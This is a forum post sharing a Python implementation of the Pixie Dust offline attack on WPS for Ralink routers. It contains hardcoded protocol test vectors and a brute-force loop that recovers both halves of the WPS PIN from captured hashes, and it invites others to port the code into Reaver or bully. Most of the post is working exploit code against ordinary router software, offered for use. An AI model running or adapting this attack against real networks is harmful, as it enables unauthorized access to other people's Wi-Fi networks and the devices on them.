Hi Guys,
I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/
Code:
import hashlib, hmac
PK_E = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"\
"e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"\
"50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"\
"5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"\
"6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"\
"7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746".decode("hex")
PK_R = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"\
"b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"\
"b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"\
"b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"\
"6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"\
"f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243".decode("hex")
eHash1 = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43".decode("hex")
eHash2 = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416".decode("hex")
AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea".decode("hex")
# if ES1,ES2 are found out, recover the halves of PIN
second_half = first_half = 0
es1 = es2 = '\00' * 16 # (str(es2).zfill(32)).decode('hex')
for first_half in xrange(10000):
PSK1_guess = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash1 == eHash1_guess): #First half done
for second_half in xrange(10000):
PSK2_guess = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash2 == eHash2_guess):
print "PIN FOUND! %04d%04d" %(first_half,second_half)
# doWPSprotocolWithPINguessed() #TODO
exit()
I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.
Proost!